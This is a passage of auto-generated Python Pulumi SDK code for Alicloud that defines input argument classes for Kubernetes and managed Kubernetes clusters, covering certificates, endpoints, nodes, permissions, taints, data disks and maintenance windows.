def taints(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "taints", value)
@pulumi.input_type
class KubernetesCertificateAuthorityArgs:
def __init__(__self__, *,
client_cert: Optional[pulumi.Input[str]] = None,
client_key: Optional[pulumi.Input[str]] = None,
cluster_cert: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] client_cert: The path of client certificate, like `~/.kube/client-cert.pem`.
:param pulumi.Input[str] client_key: The path of client key, like `~/.kube/client-key.pem`.
:param pulumi.Input[str] cluster_cert: The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
"""
if client_cert is not None:
pulumi.set(__self__, "client_cert", client_cert)
if client_key is not None:
pulumi.set(__self__, "client_key", client_key)
if cluster_cert is not None:
pulumi.set(__self__, "cluster_cert", cluster_cert)
@property
@pulumi.getter(name="clientCert")
def client_cert(self) -> Optional[pulumi.Input[str]]:
"""
The path of client certificate, like `~/.kube/client-cert.pem`.
"""
return pulumi.get(self, "client_cert")
@client_cert.setter
def client_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert", value)
@property
@pulumi.getter(name="clientKey")
def client_key(self) -> Optional[pulumi.Input[str]]:
"""
The path of client key, like `~/.kube/client-key.pem`.
"""
return pulumi.get(self, "client_key")
@client_key.setter
def client_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_key", value)
@property
@pulumi.getter(name="clusterCert")
def cluster_cert(self) -> Optional[pulumi.Input[str]]:
"""
The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
"""
return pulumi.get(self, "cluster_cert")
@cluster_cert.setter
def cluster_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_cert", value)
@pulumi.input_type
class KubernetesConnectionsArgs:
def __init__(__self__, *,
api_server_internet: Optional[pulumi.Input[str]] = None,
api_server_intranet: Optional[pulumi.Input[str]] = None,
master_public_ip: Optional[pulumi.Input[str]] = None,
service_domain: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] api_server_internet: API Server Internet endpoint.
:param pulumi.Input[str] api_server_intranet: API Server Intranet endpoint.
:param pulumi.Input[str] master_public_ip: Master node SSH IP address.
:param pulumi.Input[str] service_domain: Service Access Domain.
"""
if api_server_internet is not None:
pulumi.set(__self__, "api_server_internet", api_server_internet)
if api_server_intranet is not None:
pulumi.set(__self__, "api_server_intranet", api_server_intranet)
if master_public_ip is not None:
pulumi.set(__self__, "master_public_ip", master_public_ip)
if service_domain is not None:
pulumi.set(__self__, "service_domain", service_domain)
@property
@pulumi.getter(name="apiServerInternet")
def api_server_internet(self) -> Optional[pulumi.Input[str]]:
"""
API Server Internet endpoint.
"""
return pulumi.get(self, "api_server_internet")
@api_server_internet.setter
def api_server_internet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server_internet", value)
@property
@pulumi.getter(name="apiServerIntranet")
def api_server_intranet(self) -> Optional[pulumi.Input[str]]:
"""
API Server Intranet endpoint.
"""
return pulumi.get(self, "api_server_intranet")
@api_server_intranet.setter
def api_server_intranet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server_intranet", value)
@property
@pulumi.getter(name="masterPublicIp")
def master_public_ip(self) -> Optional[pulumi.Input[str]]:
"""
Master node SSH IP address.
"""
return pulumi.get(self, "master_public_ip")
@master_public_ip.setter
def master_public_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_public_ip", value)
@property
@pulumi.getter(name="serviceDomain")
def service_domain(self) -> Optional[pulumi.Input[str]]:
"""
Service Access Domain.
"""
return pulumi.get(self, "service_domain")
@service_domain.setter
def service_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_domain", value)
@pulumi.input_type
class KubernetesMasterNodeArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the node.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] private_ip: The private IP address of node.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip is not None:
pulumi.set(__self__, "private_ip", private_ip)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the node.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIp")
def private_ip(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address of node.
"""
return pulumi.get(self, "private_ip")
@private_ip.setter
def private_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip", value)
@pulumi.input_type
class KubernetesPermissionPermissionArgs:
def __init__(__self__, *,
cluster: pulumi.Input[str],
role_name: pulumi.Input[str],
role_type: pulumi.Input[str],
is_custom: Optional[pulumi.Input[bool]] = None,
is_ram_role: Optional[pulumi.Input[bool]] = None,
namespace: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] cluster: The ID of the cluster that you want to manage.
:param pulumi.Input[str] role_name: Specifies the predefined role that you want to assign. Valid values `admin`, `ops`, `dev`, `restricted` and the custom cluster roles.
:param pulumi.Input[str] role_type: The authorization type. Valid values `cluster`, `namespace`.
:param pulumi.Input[bool] is_custom: Specifies whether to perform a custom authorization. To perform a custom authorization, set `role_name` to a custom cluster role.
:param pulumi.Input[bool] is_ram_role: Specifies whether the permissions are granted to a RAM role. When `uid` is ram role id, the value of `is_ram_role` must be `true`.
:param pulumi.Input[str] namespace: The namespace to which the permissions are scoped. This parameter is required only if you set role_type to namespace.
"""
pulumi.set(__self__, "cluster", cluster)
pulumi.set(__self__, "role_name", role_name)
pulumi.set(__self__, "role_type", role_type)
if is_custom is not None:
pulumi.set(__self__, "is_custom", is_custom)
if is_ram_role is not None:
pulumi.set(__self__, "is_ram_role", is_ram_role)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
@property
@pulumi.getter
def cluster(self) -> pulumi.Input[str]:
"""
The ID of the cluster that you want to manage.
"""
return pulumi.get(self, "cluster")
@cluster.setter
def cluster(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster", value)
@property
@pulumi.getter(name="roleName")
def role_name(self) -> pulumi.Input[str]:
"""
Specifies the predefined role that you want to assign. Valid values `admin`, `ops`, `dev`, `restricted` and the custom cluster roles.
"""
return pulumi.get(self, "role_name")
@role_name.setter
def role_name(self, value: pulumi.Input[str]):
pulumi.set(self, "role_name", value)
@property
@pulumi.getter(name="roleType")
def role_type(self) -> pulumi.Input[str]:
"""
The authorization type. Valid values `cluster`, `namespace`.
"""
return pulumi.get(self, "role_type")
@role_type.setter
def role_type(self, value: pulumi.Input[str]):
pulumi.set(self, "role_type", value)
@property
@pulumi.getter(name="isCustom")
def is_custom(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether to perform a custom authorization. To perform a custom authorization, set `role_name` to a custom cluster role.
"""
return pulumi.get(self, "is_custom")
@is_custom.setter
def is_custom(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_custom", value)
@property
@pulumi.getter(name="isRamRole")
def is_ram_role(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the permissions are granted to a RAM role. When `uid` is ram role id, the value of `is_ram_role` must be `true`.
"""
return pulumi.get(self, "is_ram_role")
@is_ram_role.setter
def is_ram_role(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_ram_role", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
The namespace to which the permissions are scoped. This parameter is required only if you set role_type to namespace.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@pulumi.input_type
class KubernetesRuntimeArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] version: Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class KubernetesTaintArgs:
def __init__(__self__, *,
effect: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
if effect is not None:
pulumi.set(__self__, "effect", effect)
if key is not None:
pulumi.set(__self__, "key", key)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def effect(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "effect")
@effect.setter
def effect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "effect", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class KubernetesWorkerDataDiskArgs:
def __init__(__self__, *,
auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
category: Optional[pulumi.Input[str]] = None,
device: Optional[pulumi.Input[str]] = None,
encrypted: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
performance_level: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] auto_snapshot_policy_id: Worker node data disk auto snapshot policy.
:param pulumi.Input[str] category: The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
:param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
:param pulumi.Input[str] size: The size of a data disk, Its valid value range [40~32768] in GB. Unit: GiB.
"""
if auto_snapshot_policy_id is not None:
pulumi.set(__self__, "auto_snapshot_policy_id", auto_snapshot_policy_id)
if category is not None:
pulumi.set(__self__, "category", category)
if device is not None:
pulumi.set(__self__, "device", device)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name is not None:
pulumi.set(__self__, "name", name)
if performance_level is not None:
pulumi.set(__self__, "performance_level", performance_level)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
@property
@pulumi.getter(name="autoSnapshotPolicyId")
def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk auto snapshot policy.
"""
return pulumi.get(self, "auto_snapshot_policy_id")
@auto_snapshot_policy_id.setter
def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auto_snapshot_policy_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
"""
The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
"""
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def device(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "device")
@device.setter
def device(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to encrypt data disks. Valid values: true and false.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="performanceLevel")
def performance_level(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
"""
return pulumi.get(self, "performance_level")
@performance_level.setter
def performance_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "performance_level", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of a data disk, Its valid value range [40~32768] in GB. Unit: GiB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class KubernetesWorkerNodeArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: ID of the node.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] private_ip: The private IP address of node.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if private_ip is not None:
pulumi.set(__self__, "private_ip", private_ip)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the node.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="privateIp")
def private_ip(self) -> Optional[pulumi.Input[str]]:
"""
The private IP address of node.
"""
return pulumi.get(self, "private_ip")
@private_ip.setter
def private_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_ip", value)
@pulumi.input_type
class ManagedKubernetesAddonArgs:
def __init__(__self__, *,
config: Optional[pulumi.Input[str]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
"""
if config is not None:
pulumi.set(__self__, "config", config)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "config", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ManagedKubernetesCertificateAuthorityArgs:
def __init__(__self__, *,
client_cert: Optional[pulumi.Input[str]] = None,
client_key: Optional[pulumi.Input[str]] = None,
cluster_cert: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] client_cert: The path of client certificate, like `~/.kube/client-cert.pem`.
:param pulumi.Input[str] client_key: The path of client key, like `~/.kube/client-key.pem`.
:param pulumi.Input[str] cluster_cert: The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
"""
if client_cert is not None:
pulumi.set(__self__, "client_cert", client_cert)
if client_key is not None:
pulumi.set(__self__, "client_key", client_key)
if cluster_cert is not None:
pulumi.set(__self__, "cluster_cert", cluster_cert)
@property
@pulumi.getter(name="clientCert")
def client_cert(self) -> Optional[pulumi.Input[str]]:
"""
The path of client certificate, like `~/.kube/client-cert.pem`.
"""
return pulumi.get(self, "client_cert")
@client_cert.setter
def client_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert", value)
@property
@pulumi.getter(name="clientKey")
def client_key(self) -> Optional[pulumi.Input[str]]:
"""
The path of client key, like `~/.kube/client-key.pem`.
"""
return pulumi.get(self, "client_key")
@client_key.setter
def client_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_key", value)
@property
@pulumi.getter(name="clusterCert")
def cluster_cert(self) -> Optional[pulumi.Input[str]]:
"""
The base64 encoded cluster certificate data required to communicate with your cluster. Add this to the certificate-authority-data section of the kubeconfig file for your cluster.
"""
return pulumi.get(self, "cluster_cert")
@cluster_cert.setter
def cluster_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_cert", value)
@pulumi.input_type
class ManagedKubernetesConnectionsArgs:
def __init__(__self__, *,
api_server_internet: Optional[pulumi.Input[str]] = None,
api_server_intranet: Optional[pulumi.Input[str]] = None,
master_public_ip: Optional[pulumi.Input[str]] = None,
service_domain: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] api_server_internet: API Server Internet endpoint.
:param pulumi.Input[str] api_server_intranet: API Server Intranet endpoint.
:param pulumi.Input[str] master_public_ip: Master node SSH IP address.
:param pulumi.Input[str] service_domain: Service Access Domain.
"""
if api_server_internet is not None:
pulumi.set(__self__, "api_server_internet", api_server_internet)
if api_server_intranet is not None:
pulumi.set(__self__, "api_server_intranet", api_server_intranet)
if master_public_ip is not None:
pulumi.set(__self__, "master_public_ip", master_public_ip)
if service_domain is not None:
pulumi.set(__self__, "service_domain", service_domain)
@property
@pulumi.getter(name="apiServerInternet")
def api_server_internet(self) -> Optional[pulumi.Input[str]]:
"""
API Server Internet endpoint.
"""
return pulumi.get(self, "api_server_internet")
@api_server_internet.setter
def api_server_internet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server_internet", value)
@property
@pulumi.getter(name="apiServerIntranet")
def api_server_intranet(self) -> Optional[pulumi.Input[str]]:
"""
API Server Intranet endpoint.
"""
return pulumi.get(self, "api_server_intranet")
@api_server_intranet.setter
def api_server_intranet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_server_intranet", value)
@property
@pulumi.getter(name="masterPublicIp")
def master_public_ip(self) -> Optional[pulumi.Input[str]]:
"""
Master node SSH IP address.
"""
return pulumi.get(self, "master_public_ip")
@master_public_ip.setter
def master_public_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_public_ip", value)
@property
@pulumi.getter(name="serviceDomain")
def service_domain(self) -> Optional[pulumi.Input[str]]:
"""
Service Access Domain.
"""
return pulumi.get(self, "service_domain")
@service_domain.setter
def service_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_domain", value)
@pulumi.input_type
class ManagedKubernetesMaintenanceWindowArgs:
def __init__(__self__, *,
duration: pulumi.Input[str],
enable: pulumi.Input[bool],
maintenance_time: pulumi.Input[str],
weekly_period: pulumi.Input[str]):
"""
:param pulumi.Input[str] duration: The maintenance time, values range from 1 to 24,unit is hour. For example: "3h".
:param pulumi.Input[bool] enable: Whether to open the maintenance window. The following parameters take effect only `enable = true`.
:param pulumi.Input[str] maintenance_time: Initial maintenance time, For example:"03:00:00Z".
:param pulumi.Input[str] weekly_period: Maintenance cycle, you can set the values from Monday to Sunday, separated by commas when the values are multiple. The default is Thursday.
"""
pulumi.set(__self__, "duration", duration)
pulumi.set(__self__, "enable", enable)
pulumi.set(__self__, "maintenance_time", maintenance_time)
pulumi.set(__self__, "weekly_period", weekly_period)
@property
@pulumi.getter
def duration(self) -> pulumi.Input[str]:
"""
The maintenance time, values range from 1 to 24,unit is hour. For example: "3h".
"""
return pulumi.get(self, "duration")
@duration.setter
def duration(self, value: pulumi.Input[str]):
pulumi.set(self, "duration", value)
@property
@pulumi.getter
def enable(self) -> pulumi.Input[bool]:
"""
Whether to open the maintenance window. The following parameters take effect only `enable = true`.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: pulumi.Input[bool]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter(name="maintenanceTime")
def maintenance_time(self) -> pulumi.Input[str]:
"""
Initial maintenance time, For example:"03:00:00Z".
"""
return pulumi.get(self, "maintenance_time")
@maintenance_time.setter
def maintenance_time(self, value: pulumi.Input[str]):
pulumi.set(self, "maintenance_time", value)
@property
@pulumi.getter(name="weeklyPeriod")
def weekly_period(self) -> pulumi.Input[str]:
"""
Maintenance cycle, you can set the values from Monday to Sunday, separated by commas when the values are multiple. The default is Thursday.
"""
return pulumi.get(self, "weekly_period")
@weekly_period.setter
def weekly_period(self, value: pulumi.Input[str]):
pulumi.set(self, "weekly_period", value)
@pulumi.input_type
class ManagedKubernetesRuntimeArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
version: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] version: Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
Desired Kubernetes version. If you do not specify a value, the latest available version at resource creation is used and no upgrades will occur except you set a higher version number. The value must be configured and increased to upgrade the version when desired. Downgrades are not supported by ACK.
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class ManagedKubernetesTaintArgs:
def __init__(__self__, *,
effect: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
if effect is not None:
pulumi.set(__self__, "effect", effect)
if key is not None:
pulumi.set(__self__, "key", key)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def effect(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "effect")
@effect.setter
def effect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "effect", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ManagedKubernetesWorkerDataDiskArgs:
def __init__(__self__, *,
auto_snapshot_policy_id: Optional[pulumi.Input[str]] = None,
category: Optional[pulumi.Input[str]] = None,
device: Optional[pulumi.Input[str]] = None,
encrypted: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
performance_level: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
snapshot_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] auto_snapshot_policy_id: Worker node data disk auto snapshot policy.
:param pulumi.Input[str] category: The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
:param pulumi.Input[str] encrypted: Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
:param pulumi.Input[str] name: The kubernetes cluster's name. It is unique in one Alicloud account.
:param pulumi.Input[str] performance_level: Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
:param pulumi.Input[str] size: The size of a data disk, at least 40. Unit: GiB.
"""
if auto_snapshot_policy_id is not None:
pulumi.set(__self__, "auto_snapshot_policy_id", auto_snapshot_policy_id)
if category is not None:
pulumi.set(__self__, "category", category)
if device is not None:
pulumi.set(__self__, "device", device)
if encrypted is not None:
pulumi.set(__self__, "encrypted", encrypted)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if name is not None:
pulumi.set(__self__, "name", name)
if performance_level is not None:
pulumi.set(__self__, "performance_level", performance_level)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot_id is not None:
pulumi.set(__self__, "snapshot_id", snapshot_id)
@property
@pulumi.getter(name="autoSnapshotPolicyId")
def auto_snapshot_policy_id(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk auto snapshot policy.
"""
return pulumi.get(self, "auto_snapshot_policy_id")
@auto_snapshot_policy_id.setter
def auto_snapshot_policy_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auto_snapshot_policy_id", value)
@property
@pulumi.getter
def category(self) -> Optional[pulumi.Input[str]]:
"""
The type of the data disks. Valid values: `cloud`, `cloud_efficiency`, `cloud_ssd` and `cloud_essd`. Default to `cloud_efficiency`.
"""
return pulumi.get(self, "category")
@category.setter
def category(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "category", value)
@property
@pulumi.getter
def device(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "device")
@device.setter
def device(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device", value)
@property
@pulumi.getter
def encrypted(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to encrypt data disks. Valid values: true and false. Default to `false`.
"""
return pulumi.get(self, "encrypted")
@encrypted.setter
def encrypted(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "encrypted", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The kubernetes cluster's name. It is unique in one Alicloud account.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="performanceLevel")
def performance_level(self) -> Optional[pulumi.Input[str]]:
"""
Worker node data disk performance level, when `category` values `cloud_essd`, the optional values are `PL0`, `PL1`, `PL2` or `PL3`, but the specific performance level is related to the disk capacity. For more information, see [Enhanced SSDs](https://www.alibabacloud.com/help/doc-detail/122389.htm). Default is `PL1`.
"""
return pulumi.get(self, "performance_level")
@performance_level.setter
def performance_level(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "performance_level", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The size of a data disk, at least 40. Unit: GiB.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter(name="snapshotId")
def snapshot_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "snapshot_id")
@snapshot_id.setter
def snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot_id", value)
@pulumi.input_type
class ManagedKubernetesWorkerNodeArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
